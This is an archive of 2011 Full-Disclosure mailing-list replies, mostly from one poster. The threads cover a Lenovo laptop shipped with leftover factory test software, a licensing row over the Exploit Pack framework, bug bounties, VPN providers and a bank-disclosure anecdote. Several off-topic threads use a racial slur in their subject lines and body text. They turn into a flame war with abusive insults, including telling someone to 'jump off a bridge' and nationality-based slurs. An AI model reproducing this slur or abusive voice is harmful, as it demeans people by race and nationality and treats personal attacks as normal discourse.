Re: [Full-disclosure] Strange Lenovo x121e
hrm... I have known of this structure aplied, usually when a user is a 'newbie' and, it is usually still done by shops or, workers at them... and, i was originally thinking, maybe since i have also got blade IBM,but, I bought it FROM MS directly and, nothing on it but empiness, and this is 2 machines we bought at once... IBM x342 PIII 1.4ghz 3U Rack Server - IBM 86695RX -3U rack, small but as the MS emplyee told me, it MUST be completely shredded,and sits on now just cmd prompt, and there is absolutely no files, even for scsi, wich was first my thoughts. I am really wondering what it was used as, like possible ex test/demo but, I know 2 pl other than me who can attest to this, and they have not seen these files before, not in theyre blades from IBM. I have not used Lenovo x series, although, i only can think of those things added, if they think your a noob, in wich case it would have been specified that it came with 'system utils to make it save itself.." or sum such other infos.. but, i assume thats not the case atall. Anyhow, i think this box was preused, but, i think if it was, to a minor degree..altho, my blade, has NOT a scratch on it, and was pre used to.. hehe..so i really wonder, what does it take to even scratch a x1 :s Theyre thick...and, a scratch could be nothing but, attests to wear n tear... so i qwould be questioning my seller, for sure, and getting somekind of discount, id also show them these files, and, even quotes from the FD list, and i bet you they will say some kinda excuse, and refund you abit ;) this should be wiped, on any sales, it should never be more than a cmd prompt, and then, you would fdisk it and format it to use it perfect, you should never have 13gig on windows os, considering those are also used for windows ofc, but, still the seller should say that, "15gig taken up for the system checking/saving/admin files..." , but clerarly they have tried to cover something up. I would expose this one hd. 100%. You can.. regards, xd On 6 October 2011 12:05, halfdog wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > xD 0x41 wrote: > > Hrm this one is tricky, but smells so bad of preuse, specially when > > you said this; > > > > * Inside seal on plastic bag also intact, but glue is suboptimal, > > I opened the bag without damaging the seal > > > > Thats a clear sign of tamperage...thats when they tell you "do not > > buy" ... so i wonder :s > > Yeah, but I've also got trained fingers. And applying stickers on > completely fresh plastic surfaces can be tricky, especially when > plastic foil was surface-treated, so that it does not stick to itself > before being manufactured to plastic bags. > > > I know it could . Is it perhaps something being leftover, from > > some badly warezd ISO Windows install...wich can lay dormant, even > > after a format but, not after fdisk usually... strange, i cannot > > figure this one. It smells of pre-use, or ex-demo, but, i have got, > > 3 ibm netvista 2cpu boxes,1 3.3gig awesome IBM thinkcentre,fastest > > box i have as in loading/swap access,and IBM Blade,IBM laptop, and > > not one has those files...i even paid for ex-demo on the laptop, > > and it was installed... > > I think, I have a good explanation: I looked through the files and > found quite a mess, even for MS-system. Even c:\ is loaded with > various nonstandard files. Many of these files are around testing > (testplan xy, fantest, modemtest, mark3d, ..) and test orchestration > scripts, one of them setting the clock back to 2010-01-01, so file mod > dates should be meaningless. > > It seems, that the machine contains at least 13G of windows-OS and > testing software. I found some test reports (dated 2010-01-01), that > contain the hardware tag of the machine. The BIOS seems to be > 2011-06-21, that is also proof for clock manipulation during testing. > > What could be interesting: Although I found some tools via google, > e.g. rw-everything, a "hardware configuration reader/dumper", there > are also some tools I do not know, that might deal about branding or > special hardware initialization, e.g. > > ./WWAN/Leadcore/BAK/IMEI.TXT > ./WWAN/Leadcore/IMEI.TXT > > with different IMEI in it. Perhaps the disk contains some new tools > that allow to reset broken hardware/firmware internals to any state > you like, e.g. perhaps the imei of your modem. > > > > i can only see *no* good reason for .exe to be on the drive, after > > a sale. It should have always been wiped/fdisk/shredded, as I know > > i have had done withthe ex demos i have here, and, they are part > > lenovo and part IBM and still, not one of those files exits on any > > box, and the laptop wich, i thought would forsure have
Re: [Full-disclosure] Full-Disclosure - sick of your nonsense
Eh for someone who claims they dont like nnsense, then why make a thread, i will not be a[part of this thread btw, my problem with n3td3v, was NOT instigated by me eitherand btw when u pick on my grammer, take a look @ your own ones.. Luckily, there are mail filters, so i your me So, luckily, my time wont be wasted, coz i wont be replying to you, nor this thread, you have created to make your own noise, kid. ciao. xd On 6 October 2011 14:14, mitchell wrote: > Personally, if I dislike a product i do not use it. However, I > understand that there are people that need to share their likes and > dislikes with as many people as possible. The usefulness of this is > arguable at best. > > Luckily, there are mail filters, so i your messages take more CPU > seconds than real seconds of my time. > > Take care. > > #/mitchell > > On 10/06/2011 02:48 AM, xD 0x41 wrote: > > Starting fights... because i dislike one product, and question ITsec... > > is hardly what your trying to make me out to be. > > Think, and do as you like. > > cheers. > > xd > > > > > > On 6 October 2011 10:31, Sam Goody > <mailto:trashm...@hush.com>> wrote: > > > > Dude, I think many people including myself are sick of your > > nonsense on top of trying to provoke fights on full-disc. > > > > This list is not for chatting and 90% of what you've written is > > subpar. > > > > Please keep the nonsense to yourself. You will now be added to the > > n3td3v e-mail black list. > > > > Cheers! > > > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
I would say, this code would require better, like Creative Commons, perhaps lisencing on 3rd party code, then it can be named exactly what is and isnt added in as a 'paper' to the commons, it is better for his project, i think... GPLv3 , i have not studied but, i am considering the use of 3rd partry modules wich have NO lisencing whatsoever. I will try to help him but, he has to understand, there is simple rules about these things... I think he does though understand, so i will offer my help in this anyhow.. I guess you also have helped, by pointing the lisencing out for him to.. But id debate on wich lisence touse... id take CCommons.. cheers, xd On 6 October 2011 14:34, root wrote: > Juan, > > You don't have the faintest idea of how licencing works. You cannot slap > a GPL v3 license to any software you see, much less erase the author's > names. If you find a code in the internet without any license, you > pretty much can't touch it, and must re-implement it completely. > > Software business steal code all the time, but they don't release the > software for everybody to see! > > Next time instead of a few laughs at a list, you may get sued and lose > real money, you fool. > > Please learn how licensing works and just then republish all your code. > > > On 10/05/2011 06:25 PM, Juan Sacco wrote: > > If you want the right to demand certain things from the program, then go > BUY > > a program and do not harass people who are writing software for free, or > go > > and help the developers by writing the functionality yourself. > > > > Juan Sacco > > > > On Wed, Oct 5, 2011 at 6:32 AM, root wrote: > > > >> - * @author Stefan Zeiger (szei...@novocode.com) > >> - print " Written by Blake " > >> - > >> > >> +#Exploit Pack - Security Framework for Exploit Developers > >> +#Copyright 2011 Juan Sacco http://exploitpack.com > >> +# > >> +#This program is free software: you can redistribute it and/or modify > >> it under the terms of the > >> +#GNU General Public License as published by the Free Software > >> Foundation, either version 3 > >> +#or any later version. > >> +# > >> +#This program is distributed in the hope that it will be useful, but > >> WITHOUT ANY WARRANTY; > >> +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A > >> PARTICULAR > >> +#PURPOSE. See the GNU General Public License for more details. > >> +# > >> +#You should have received a copy of the GNU General Public License > >> along with this program. > >> +#If not, see http://www.gnu.org/licenses/ > >> > >> > >> > >> Ys why not? > >> > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Strange Lenovo x121e
Perhaps the disk contains some new tools > that allow to reset broken hardware/firmware internals to any state > you like, e.g. perhaps the imei of your modem I have (repeating) seen this, (ONLY on a laptop...), but it is very possible... but 13gig of it :S thats abit much... On 6 October 2011 12:45, coderman wrote: > On Wed, Oct 5, 2011 at 6:05 PM, halfdog wrote: > >... > > It seems, that the machine contains at least 13G of windows-OS and > > testing software > > What could be interesting: Although I found some tools via google, > > e.g. rw-everything, a "hardware configuration reader/dumper", there > > are also some tools I do not know, that might deal about branding or > > special hardware initialization, e.g. > > > > ./WWAN/Leadcore/BAK/IMEI.TXT > > ./WWAN/Leadcore/IMEI.TXT > > > > with different IMEI in it. Perhaps the disk contains some new tools > > that allow to reset broken hardware/firmware internals to any state > > you like, e.g. perhaps the imei of your modem. > > > these kinds of tools do exist, and are exceptionally useful. > > often highly proprietary (containing magic signing keys or firmwares > for testing). > > what about a full file dump? were you able to reconstruct anything useful? > i can has? :P > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
1337 and then 31337 for exec cmd..yea.. but have not seen more paid... On 6 October 2011 19:01, Dan Dart wrote: > tl;dr past popcorn, but when I saw $2, I lol'd. Weren't Google giving $1337 > at some point? And didn't it go up to like $50,000 for a terrible remote > root exploit? > > Regards > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Just some updates... seems there is a fire blazing maybe soon.. VPN Providers Mull "Fraudster" Database In Wake of Lulzec Fiasco http://feed.torrentfreak.com/~r/Torrentfreak/~3/4MWSrug7DKA/ nasty.. On 5 October 2011 22:17, wrote: > On Wed, 05 Oct 2011 17:25:20 +0900, Robert Kim App and Facebook Marketing > said: > > Guys... i can't stand sites like Attrition > > it's all based on total heresay and feed off mob stupidity. AND it ruins > > perfectly good reputations. > > OK, I'll bite. What percent of Attrition listings are of sites that didn;t > actually > get hacked? (Serious question there - I've never actually done a check of > their > accuracy. Anybody got numbers to back up Robert's claim?) > > And I'm not sure that an Attrition listing is sufficient to ruin a good > reputation. > Heck, Sony won a Pwnie Award and it didn't do squat to their stock price. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
eek.. risking n3td3v fate, sorry for offtopic. I think you came close buddy, but noway do you come close to that n3td3v dood...Although, you are usually one of the people i look to on this list for some guidance, ie, you, thor, halfdog,madirish,and many other older/better trained to this, and that one did let me down, but no way would i scrap you for a n3td3v :) cheers.. just gotta b careful nowdays, specially if your in .au where, there is basically no racism... not to the extent of gangs etc setup who are attacking other people for race...color,etc.. well, not yet. stay cool buddy xd On 7 October 2011 04:21, Georgi Guninski wrote: > risking n3td3v fate, sorry for offtopic. > > the nigger said [1] (no offense intended to black people): > > "American people understand that not everybody's been following the rules," > he said. "These days, a lot of folks doing the right thing are not rewarded. > A lot of folks who are not doing the right thing are rewarded." > > [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html > > -- > joro > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Full disclosure: American Express
Hello, I have had almost exactly the same thing here, with anz.com , and this is now ended but almost as bad as that! They were being scammed, and spam mails were actually makin it to the inbox and were half decent, so i tried, mutiple times to put in a 'contact form' wich kept resetting when id submit, and make some error page... Then same bank but a different branch, i was able to ring, and explain, then they offered to ring another bank, total different one but also being targetted for scam and , as always the famous CCard. It was frustrating as hell..and sofar, did not get any thanks, yet have noticed the crap drop off completely now. i guess is sad and, a huge reason about why i love this topic... it is very frustrating. You were vigilant, I applaud this, because thats the only way with some places, and you would expect these places, ie, anz, to have some abuse-only mails, well at that time, they didnt, and i have not seen it with a quick browse...but i imagine they changed nothing, I hope they fixed the form it was only browser based bug,but still, it took me a cpl days,but yes they did get scammed,and many many numbers were then released onto even irc nets...i saw this and was abit saddened, sometimes security can be a harsh place to work or, try to help even. cheers, xd R.I.P Steve Jobs Innovative/Ingenius mind, Thankyou for the old Apple Box, thats how i became addicted to tech, will be sadly missed. On 6 October 2011 17:55, John Doe wrote: > http://qnrq.se/full-disclosure-american-express/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
eh... lol, i am living in australia, and know exactly how things work. I think you are maybe sending the email without reading the posters email... I have not said anything about USA, only au. for someone who is meant to be mature, you dont seem to act it,... but, your throwing abuse at the wrong guy. And yes, i know exactly how gangs work,. and, have actually spent 4yrs behind bars :) thx k. bye xd On 7 October 2011 06:09, Sam Goody wrote: > You should really jump off a bridge. You always talk out of your > ass including this one. > > How do you know there isn't racism in AU? > > How you ever been there? Do you know any history about the racism > that the native Indians have experienced? Do you know about all > other cultures that have had to endure racist laws in the AU? > > You have got no clue you piece of shit. > > Why don't you fucking get your head out of your ass. And what do > you know about gangs? Are you now a gang expert? So gangs now > inspire racism? > > Do you even know what racism means? > > You're a fucking failure you American piece of Shit. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
Do you know any history about the racism that the native Indians have experienced? haha yes yes they would be named Aboriginals, in USA , the Indians were somewhat persecuted :) get YOUR head out of YOUR arse idiot. xd On 7 October 2011 06:09, Sam Goody wrote: > You should really jump off a bridge. You always talk out of your > ass including this one. > > How do you know there isn't racism in AU? > > How you ever been there? Do you know any history about the racism > that the native Indians have experienced? Do you know about all > other cultures that have had to endure racist laws in the AU? > > You have got no clue you piece of shit. > > Why don't you fucking get your head out of your ass. And what do > you know about gangs? Are you now a gang expert? So gangs now > inspire racism? > > Do you even know what racism means? > > You're a fucking failure you American piece of Shit. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
“, the Indians were somewhat persecuted :) “ By that I take it you mean, systematic genocide? Where I grew up the school mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who not only murdered Indians, he wiped out entire villages massacring men, women and children in most of the villages in the area to eliminate the “native threat” for the white settlers. hehe i really dont know, and really, dont care... it is always some new and different views, so i just know from my school classes, indians were indeed hunted, and they also, fought back.. abit like aboriginals here.. but, this guy i think was high on ice or sumthin before he even spoke to me, he assumes i am now a racist :s I was saying, this country here in .au , is prolly the least one i could think of, as we have maybe 5 races alone in my street, maybe more, how could you fight your neighbor... abit like some countries ;) (iran/iraq , serbia/bosnia)...just gotup one day because told to, and took up arms, literally, against theyre neighbors... Thats happening now, and it is still called genocide.. That is "life'... I aint young enough to join the army and make any difference. anyhow, i aint really into this race talk, and, dont want nothin todo with it, am no racist, simply not brought up to think badly of other people... this could happen, anywhere.. cheers xd On 7 October 2011 06:19, Csirt, Star wrote: > ** ** ** > > “, the Indians were somewhat persecuted :) “ > > ** ** > > By that I take it you mean, systematic genocide? Where I grew up the school > mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who > not only murdered Indians, he wiped out entire villages massacring men, > women and children in most of the villages in the area to eliminate the > “native threat” for the white settlers. > > ** ** > > ** ** > > ** ** > -- > > *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: > full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41 > *Sent:* Thursday, October 06, 2011 3:14 PM > *To:* Sam Goody > *Cc:* **full-disclosure@lists.grok.org.uk** > *Subject:* Re: [Full-disclosure] OT Nigger - > georgi+guninski+nigger+full-disclosure > > ** ** > > Do you know any history about the racism > that the native Indians have experienced? > > haha yes yes they would be named Aboriginals, in USA , the > Indians were somewhat persecuted :) > > get YOUR head out of YOUR arse idiot. > xd > > > > > On 7 October 2011 06:09, Sam Goody wrote: > > You should really jump off a bridge. You always talk out of your > ass including this one. > > How do you know there isn't racism in AU? > > How you ever been there? Do you know any history about the racism > that the native Indians have experienced? Do you know about all > other cultures that have had to endure racist laws in the AU? > > You have got no clue you piece of shit. > > Why don't you fucking get your head out of your ass. And what do > you know about gangs? Are you now a gang expert? So gangs now > inspire racism? > > Do you even know what racism means? > > You're a fucking failure you American piece of Shit. > > ** ** > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Hi Valdis, it is more complex than i thought... I do support open src, and am going to try and help the exploit pack, so, i hope that the maker is reading all of this and making some adjustments perhaps... alot of them actually. I did not think it was as complex as it has shown to be, but it indeed is. I am still abit worried though, of the actual NON free prouct, and then, what if you add to that, and he adds it to his paid-fopr app, or worse, doesnt even put it into the exploit-pack but, rather puts it into ONLY the paid product. Being .py script based code, it really has potential but the author has to get the GPL/lisencing in order and, make Insect pro and this product cleared up,asin to where your exploit code goes, will it stay there, or will it be added to his paid app... he could even be doing this, to get cheap exploits, to indeed put into the paid app... it is another possiblility, but, i do see he is putting in the hours, asin trying to make some changes to this app so it does work... so, for now, it is in public. cheers. xd On 7 October 2011 01:09, wrote: > On Wed, 05 Oct 2011 19:04:24 -0300, Juan Sacco said: > > > Exploit Pack is licensed GPL let me copy & paste the 4 freedoms. I hope > to > > do it well this time. > > Please note that one of the biggest complaints about the GPL is that it is > pretty much impossible to legally combine GPL code with code that has a > non-GPL-compatible license (which includes most proprietary code). So you > need > to be careful about the origins and licensing on each and every line of > code > that you include from other sources. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
i guess some, but we dont see ourselfs as a different to them. They were simply here first. Thats how they like to be seen, nowdays.. I am not going to even go into racism in usa, but Indians, blacks and all people would take exception to what YOU said, about 'niggers'. So stop shifting the blame,... i was tryin to b nice to you, re something VERY stupid and racist, wich YOU said, so dont pull me into it buds, you said the word, not me. We dont even use 'niggers' here so, your in a way different country, todo with racism, we dont like it, nor allow it, want an example? AFL league here, our code of football (rather rough but still..football) and highly paid people... if one of them is caught on or off mic, saying the 'abo' word, in a nasty way to another player, that could mean end of theyre season, and at the VERY least, a HUGE amount of fine, and atleast 6weeks out of game.. wich is the norm. It is not out of control here, and, i think aboriginals would agree. I know many, and they like to be seen as white, or, just aussies. Nothing more. You should NEVER pick on someones color George, and this is what YOU did, not me. xd On 7 October 2011 06:56, wrote: > On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: > > > cheers.. just gotta b careful nowdays, specially if your in .au where, > there > > is basically no racism... > > I suspect some of the aboriginals would take exception to that statement. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Well, I guess then people nowdays should be keeping more watch on ANYTHING they release into public... It is just going to get more complex i assume, with adding more lisences, as creative commons has kindly done.. however i do like theyre lisence, as it actually covers a .txt file, or even a .c file... wich is mainly why i have used it once in past for some code, so I could then keep an eye on it, but never have looked atall, at GPL. Anyhow, thx Valdi for shedding more light on things. On 7 October 2011 07:03, wrote: > On Fri, 07 Oct 2011 06:36:51 +1100, xD 0x41 said: > > > I am still abit worried though, of the actual NON free prouct, and then, > > what if you add to that, and he adds it to his paid-fopr app, or worse, > > doesnt even put it into the exploit-pack but, rather puts it into ONLY > the > > paid product. > > One of the good things about the GPL (as opposed to the BSD license), is > that > you *can't* take GPL code private - if he's adding it to the proprietary > app > and shipping the result under a non-GPL license, he's in violation of the > GPL > and could end up in court. A lot of embedded hardware people have gotten > into trouble that way. The *vast* majority have cleaned up their act and > complied > with the GPL requirements by either removing the GPL code or releasing > source > as required by the GPL. A few have been silly enough to let it get to > court, > and have universally been handed their butts by the judge. > > http://www.gpl-violations.org/ > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
hehe, and, whats that todo with racist, do you even realise many of those things, are actually asked for by leaders of communities, I am asuming your pointing at one of .australian notes, you should really be ashamed..really, take a look at who you are if your american, and you can truly say, your not racists, you always seem to have a view on it, and always a comment on it, thats probably why somany world-leaders have called usa a big-mouth and bully somuch... sorry but, racism, usa takes the lead there... i mean, half of your country still has arachaic laws, in missippi even, gawd.. i wont go into it, you should be ashamed, atleast some countries are trying to make inroads to theyre past failures, not, keep it alive.. fire burning bright. I used to loveee usa, and still kinda do, but, i really dislike the way it has handled many diplomatic things, and, this is not a place to be discussing it, maybe, amuse me on irc otherwise please, dont include me on USA politics and racism... It is by far the worst topic usa could be involved in. You are copmparing a tiny country, to a country of mutiple millions...and some, and you still havent clearly, learnt from persecutions against the many , for example, atm right now, Afghanistan...wasting peoples time/money and other countrys, for something wich is a fail and, you know it. Dont involve me in your pathetic race riots and online crp, i dont want anything todo with it. have a nice day. xd On 7 October 2011 07:04, Jeffrey Walton wrote: > On Thu, Oct 6, 2011 at 3:19 PM, Csirt, Star wrote: > > “, the Indians were somewhat persecuted :) “ > > > > By that I take it you mean, systematic genocide? Where I grew up the > school > > mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer > who > > not only murdered Indians, he wiped out entire villages massacring men, > > women and children in most of the villages in the area to eliminate the > > “native threat” for the white settlers. > At least the US did not put his picture on paper money (like another > who attempted genocide). > > Jeff > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
umm.. idid not start this thread, nor many of the ones your actually replying to... have you even noticed this. fool. On 7 October 2011 07:04, Antony widmal wrote: > Thing is, you bring shit, stupidity, troll on this mailing list. Most > people here would agree. > How about you start another shit/off-topic thread about Israel vs > Palestinian this time ? > Could be a fucking great topic on a IT sec mailing list. > > > On Thu, Oct 6, 2011 at 3:53 PM, xD 0x41 wrote: > >> Oh, the brilliant one with nothing to offer... again. >> This list is getting worse, with or w/out me.. it only needs u and n3td3v >> and is perfect. yung. >> I make, i think, abit more than the avg McDonalds manager... so , you can >> dreamup your sick fantasies but, unfortunately the truth is truth. >> ciao bella. >> xd >> >> >> >> On 7 October 2011 06:44, Antony widmal wrote: >> >>> Didn't know you could flip burgers and use your smartphone while working >>> at Mc-Donald. >>> >>> >>> On Thu, Oct 6, 2011 at 3:24 PM, xD 0x41 wrote: >>> >>>> “, the Indians were somewhat persecuted :) “ >>>> >>>> >>>> By that I take it you mean, systematic genocide? Where I grew up the >>>> school mascot (high school) was Benjamin Logan, an in(?)-famous Indian >>>> killer who not only murdered Indians, he wiped out entire villages >>>> massacring men, women and children in most of the villages in the area to >>>> eliminate the “native threat” for the white settlers. >>>> >>>> hehe i really dont know, and really, dont care... it is always some new >>>> and different views, so i just know from my school classes, indians were >>>> indeed hunted, and they also, fought back.. abit like aboriginals here.. >>>> but, this guy i think was high on ice or sumthin before he even spoke to >>>> me, >>>> he assumes i am now a racist :s >>>> I was saying, this country here in .au , is prolly the least one i could >>>> think of, as we have maybe 5 races alone in my street, maybe more, how >>>> could >>>> you fight your neighbor... abit like some countries ;) (iran/iraq , >>>> serbia/bosnia)...just gotup one day because told to, and took up arms, >>>> literally, against theyre neighbors... Thats happening now, and it is still >>>> called genocide.. >>>> That is "life'... I aint young enough to join the army and make any >>>> difference. >>>> anyhow, i aint really into this race talk, and, dont want nothin todo >>>> with it, am no racist, simply not brought up to think badly of other >>>> people... this could happen, anywhere.. >>>> cheers >>>> xd >>>> >>>> >>>> >>>> On 7 October 2011 06:19, Csirt, Star wrote: >>>> >>>>> ** ** ** >>>>> >>>>> “, the Indians were somewhat persecuted :) “ >>>>> >>>>> ** ** >>>>> >>>>> By that I take it you mean, systematic genocide? Where I grew up the >>>>> school mascot (high school) was Benjamin Logan, an in(?)-famous Indian >>>>> killer who not only murdered Indians, he wiped out entire villages >>>>> massacring men, women and children in most of the villages in the area to >>>>> eliminate the “native threat” for the white settlers. >>>>> >>>>> ** ** >>>>> >>>>> ** ** >>>>> >>>>> ** ** >>>>> -- >>>>> >>>>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: >>>>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41 >>>>> *Sent:* Thursday, October 06, 2011 3:14 PM >>>>> *To:* Sam Goody >>>>> *Cc:* **full-disclosure@lists.grok.org.uk** >>>>> *Subject:* Re: [Full-disclosure] OT Nigger - >>>>> georgi+guninski+nigger+full-disclosure >>>>> >>>>> ** ** >>>>> >>>>> Do you know any history about the racism >>>>> that the native Indians have experienced? >>>>> >>>>> haha yes yes they would be named Aboriginals, in USA , the >>>>> Indians were somewhat persecuted :) >>>>> >>>>> get YOUR head out of YOUR arse idiot. >>>>> xd >>>>> >>>&
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
Yes ofcourse, we have gangs here roaming wild, attacking eachother because of color... yep! you sure know your stuff! On 7 October 2011 07:07, Benjamin Krueger wrote: > Racism in Australia is so notable, it has its own Wikipedia article. > Unfortunately the article does not touch on recent Australian racism, > particularly amongst government officials, against African refugees and > immigrants. > > http://en.wikipedia.org/wiki/Racism_in_Australia > > On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote: > > On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: > > cheers.. just gotta b careful nowdays, specially if your in .au where, > there > > is basically no racism... > > > I suspect some of the aboriginals would take exception to that statement. > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
And as for wikipedia, i dont think you would FIT all of USA's racism crap into it, so it is seperated, i think i would find atleast 100 wiki: on Usa*racism, try it, then show the REAL stats. Anyhow, this is not my shit, so, stop looking to me, i did not start this thread, nor give a crap about it, and, you clearly do not understand australian laws, nor, have lived here, or you would know that, we are far from racists, and, our past mistakes, have atleast been 'apologised' for, diplomatically, wich is mainly, what the natives here wanted, the aboriginals. Have a nice day to you also. xd On 7 October 2011 07:07, Benjamin Krueger wrote: > Racism in Australia is so notable, it has its own Wikipedia article. > Unfortunately the article does not touch on recent Australian racism, > particularly amongst government officials, against African refugees and > immigrants. > > http://en.wikipedia.org/wiki/Racism_in_Australia > > On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote: > > On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: > > cheers.. just gotta b careful nowdays, specially if your in .au where, > there > > is basically no racism... > > > I suspect some of the aboriginals would take exception to that statement. > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
whos trolling who ? screw you, and this stupid thread. On 7 October 2011 07:48, Benjamin Krueger wrote: > http://en.wikipedia.org/wiki/Straw_man > > On Oct 6, 2011, at 1:46 PM, xD 0x41 wrote: > > Yes ofcourse, we have gangs here roaming wild, attacking eachother because > of color... yep! > you sure know your stuff! > > > On 7 October 2011 07:07, Benjamin Krueger wrote: > >> Racism in Australia is so notable, it has its own Wikipedia article. >> Unfortunately the article does not touch on recent Australian racism, >> particularly amongst government officials, against African refugees and >> immigrants. >> >> http://en.wikipedia.org/wiki/Racism_in_Australia >> >> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote: >> >> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: >> >> cheers.. just gotta b careful nowdays, specially if your in .au where, >> there >> >> is basically no racism... >> >> >> I suspect some of the aboriginals would take exception to that statement. >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
*yawns* is 7am here dude quit with it, racism is just bad for anyone. so stop it, please, this is my final post to this thread, it is useless, abit like you. wether george, or anyone made any errors, that is still not FD! Show me some exploit, and i will respect. For showing me nonsense trolling, you get nothing benj. later. On 7 October 2011 07:55, Benjamin Krueger wrote: > http://www.nizkor.org/features/fallacies/red-herring.html > > On Oct 6, 2011, at 1:48 PM, xD 0x41 wrote: > > And as for wikipedia, i dont think you would FIT all of USA's racism crap > into it, so it is seperated, i think i would find atleast 100 wiki: on > Usa*racism, try it, then show the REAL stats. > Anyhow, this is not my shit, so, stop looking to me, i did not start this > thread, nor give a crap about it, and, you clearly do not understand > australian laws, nor, have lived here, or you would know that, we are far > from racists, and, our past mistakes, have atleast been 'apologised' for, > diplomatically, wich is mainly, what the natives here wanted, the > aboriginals. > Have a nice day to you also. > xd > > > > On 7 October 2011 07:07, Benjamin Krueger wrote: > >> Racism in Australia is so notable, it has its own Wikipedia article. >> Unfortunately the article does not touch on recent Australian racism, >> particularly amongst government officials, against African refugees and >> immigrants. >> >> http://en.wikipedia.org/wiki/Racism_in_Australia >> >> On Oct 6, 